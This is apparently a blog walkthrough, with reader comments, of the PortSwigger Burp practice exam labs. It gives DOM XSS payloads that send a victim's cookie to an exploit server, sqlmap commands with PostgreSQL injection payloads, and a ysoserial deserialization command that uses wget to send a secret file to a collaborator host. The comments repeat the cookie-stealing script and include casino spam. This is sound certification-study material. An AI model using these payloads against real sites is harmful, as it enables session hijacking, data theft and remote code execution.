For details of the exam and labs, go to https://portswigger.net/web-security/certification/how-it-works
EXAM PREP 1/3: XSS
1. DOM XSS in lookup function
- to find it, send lookup to intruder, burp scanner will raise it as DOM OR not DOM XSS. The vuln js is at 'resources/js/searchResults.js'
- Chrome "untrusted types" plugin will show reflected vuln eval payload statement in use in console tab!
It will show the js payload to inject to complete the popup statement:
var searchResultsObj = {"results":[],"searchTerm":""-alert(1)-""}
- Possible payloads at the search function are: (refer to Lab Reflected DOM XSS)
\\"-alert(1)}//
OR
"-alert(1)-"
- notes: https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
- Highly recommended to install https://github.com/filedescriptor/untrusted-types for Chrome, useful to look for dangerous sinks such as eval. Eg:
- "-alert(document.cookie)-" will be blocked by server, can be seen in network tab in devtools, need to find bypass, google it.
to bypass document.cookie filter use this trick:
\\"-alert(window["document"]["cookie"])}//
OR
"-alert(window["document"]["cookie"])-"
*go to https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/ for more info*
* use "untrusted types" chrome plugin to help you get the right bypass syntax*
- to send the victim cookie to attacker server and to evade eval filter encode the dots in url format %2e:
\\"-(window["document"]["location"]="https://exploit-ac271f041e05294980199d1901ad0098%2eweb-security-academy%2enet/?"+window["document"]["cookie"])}//
OR
"-(window["document"]["location"]="https://exploit-ace61f411f22344280191eb3016d00ea%2eweb-security-academy%2enet//?"+window["document"]["cookie"])-"
- Host this js script on exploit server, taken from "Lab: Reflected XSS into HTML context with all tags blocked except custom ones". The url in exploit server must be uri encoded completely.
<script>
location='https://ac2d1f471e24291580959d6900e30065.web-security-academy.net/?lookup=%5C%5C%22-%28window%5B%22document%22%5D%5B%22location%22%5D%3D%22https%3A%2F%2Fexploit-ac271f041e05294980199d1901ad0098%252eweb-security-academy%252enet%2F%3F%22%2Bwindow%5B%22document%22%5D%5B%22cookie%22%5D%29%7D%2F%2F';
</script>
OR
!! NOTE: they interchange search_term or lookup or someshit...watch out!!
<script>
location='https://ac701f751f8f348b80171ec10036004a.web-security-academy.net/?search_term=%22-%28window%5B%22document%22%5D%5B%22location%22%5D%3D%22https%3A%2F%2Fexploit-ace61f411f22344280191eb3016d00ea%252eweb-security-academy%252enet%2F%2F%3F%22%2Bwindow%5B%22document%22%5D%5B%22cookie%22%5D%29-%22';
</script>
- obtain session cookie for carlos and login. You are done with 1/3. Now time to access the admin panel!
EXAM PREP 2/3 SQLi
2. use burp scanner to scan for SQLi.
- insertion point at the 'SortBy=DATE' param, put a * and feed it into sqlmap like a pro hacker:
https://ac2d1f471e24291580959d6900e30065.web-security-academy.net/filtered-search?lookup=test&SortBy=DATE'&blogger=
- use sqlmap to extract.
sqlmap -u "https://ac2d1f471e24291580959d6900e30065.web-security-academy.net/filtered-search?lookup=test&SortBy=DATE*&blogger=" --cookie="_lab=46%7cMCwCFG2IfeQ5CHUndYpTAPtmGpE8MZRHAhROekAjQ2%2bFoBDYXnQhjEaI0TGBCTenrDuN8SmGoEzablVpLkdA07iiBE72yehRPHxSL5BW4bAUUq1m6Apg%2fO6jwIIPOjCU4qfFuoNCIz9S%2f7Nk12%2fOvm4C7BmOU4QbEYLOdPrZgIGUCe0%3d; session=DtX3UfneU9ZTeTlU20TY7lUzRj7DEhCL" --dump
- Based on sqlmap, the PostgreSQL injections are:
Parameter: #1* (URI)
Type: boolean-based blind
Title: PostgreSQL boolean-based blind - Parameter replace
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=(SELECT (CASE WHEN (9975=9975) THEN 9975 ELSE 1/(SELECT 0) END))&blogartist=
Type: error-based
Title: PostgreSQL error-based - Parameter replace
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=(CAST((CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (4363=4363) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(106)||CHR(113)) AS NUMERIC))&blogartist=
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=DATE;SELECT PG_SLEEP(5)--&blogartist=
Type: time-based blind
Title: PostgreSQL > 8.1 time-based blind - Parameter replace
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=(SELECT 5932 FROM PG_SLEEP(5))&blogartist=
- use the following manual SQLi to get the admin passwd:
????????
- extract administrator password and delete user carlos from admin panel.
EXAM PREP 3/3 SERIALIZED
3. serialization at admin-prefs cookie! Bug can be detected using Burp scanner
- payload is base64 + gzip. Use Burp 'Deserialization scanner' plugin to test and confirm gadget. It will detect the following:
Apache Commons Collections 3 Alternate payload 2 (Sleep): Potentially VULNERABLE!!!
Commons BeanUtils (Sleep): Potentially VULNERABLE!!!
Apache Commons Collections 3 Alternate payload 3 (Sleep): Potentially VULNERABLE!!!
!!ALL FALSE+, NEED TO TEST YOURSELF, LOOK IN BURP SCANNER OUTPUT!!
- please do this in Kali!! Need ysoserial.jar
- refer to Lab: Exploiting Java deserialization with Apache Commons
Eg:
java -jar ysoserial-master-d367e379d9-1.jar CommonsCollections5 'cat /home/carlos/secret' | base64
- They blocked backticks, so don't try to exfiltrate OOB via DNS or wget. Eg 'host `cat /home/carlos/secret`.xxxxx.burpcollaborator.net. It won't work!
- Commons Collections 5
java -jar ysoserial-master-d367e379d9-1.jar CommonsCollections5 'wget --post-file /home/carlos/secret 57atjr760eg9rmvtk7hwu2ho4fa68ux.burpcollaborator.net' | gzip -f | base64 -w0
- https://notsosecure.com/oob-exploitation-cheatsheet/
- need to OOB the /home/carlos/secret in wget request, output will be visible in burp collab.
3/3 completed
Hey - I know this is for the practise exam, but have you attempted the real exam? If so, how different is it, or is it much more difficult compared to the practise one?
ReplyDeleteyes, please refer to https://www.r00tpgp.com/2021/12/burp-certified-practitioner-exam.html
DeleteFor me the deserialization worked with CommonsCollections6
ReplyDeletecool! Good luck with the exam!
Deletehi, i just confused on this
ReplyDelete- Host this js script on exploit server, taken from "Lab: Reflected XSS into HTML context with all tags blocked except custom ones". The url in exploit server must be uri encoded completely.
i try already to input similar with your js script and i try to modified (only the URL) but there is no session for carlos.
can you explain how to ?
with the xss payload i only get my session. not carlos session. please explain. thank you.
DeleteGood Job Buddy!
ReplyDeleteThis is really helpful.
This is the only blog post regarding practice exam i found.
Thank You so much.
Hi ! can you share how you can get carlos session ?
DeleteGoto exploit server and add this in body section, make sure to replace the lab id and exploit-server id
Deletestore and click deliver exploit to victim, then check access log you will find something session=xxxx
copy the session id and press f12 (Firefox) to open developer tools goto and application and replace the older session id with the newer one. press enter and refresh your tab and head over to the my account section. You will see 1st part of the lab solved
script
location='https://ac701f751f8f348b80171ec10036004a.web-security-academy.net/?search_term=%22-%28window%5B%22document%22%5D%5B%22location%22%5D%3D%22https%3A%2F%2Fexploit-ace61f411f22344280191eb3016d00ea%252eweb-security-academy%252enet%2F%2F%3F%22%2Bwindow%5B%22document%22%5D%5B%22cookie%22%5D%29-%22';
/script #makre sure to include script tags, i cannot enter it here, it's not allowed here
This comment has been removed by the author.
DeleteThank youuu so muchh
DeleteTo solve the lab, you have to complete all three steps. Now that you solve the first step, the second step is to exploit sqli find the administrator password,login an adminstrator and third you have to exploit admin-prefs cookie, you will receive the key in burp colob.
Deleteyes thank you Ilyas for your help now i am on 3rd phase which is i never been face this deserialization technique. thank you once again
Deletehey ilyas, i got stuck on phase 3. there is no respond on my burp collaborator client. i used the same way with this clue like using CommonsCollections 5, wget --post. do you have any clue for this ?
Deletechange it to CommonsCollections6, copy the output and paste it in the decoder tab, encode it as url and copy the encoded payload paste it directly in the req section of the admin-prefs cookie. send the req and click the pull button multiple times.
DeleteThis comment has been removed by the author.
ReplyDeleteHello.
ReplyDeleteIs it possible to contact you via Telegram ?
Thanks.
Merkur 15c Safety Razor - Barber Pole - Deccasino
ReplyDeleteMerkur 15C Safety Razor - Merkur - 15C for casinosites.one Barber poormansguidetocasinogambling.com Pole https://deccasino.com/review/merit-casino/ is the perfect introduction casino-roll.com to the Merkur Safety Razor. https://octcasino.com/
This comment has been removed by the author.
ReplyDeleteThanks for the post. Can you let me know which encoder you used to encode the dots in url format %2e because most url encode I try are not encoding the . which is in the payload.
ReplyDeleteAwesome <3
ReplyDelete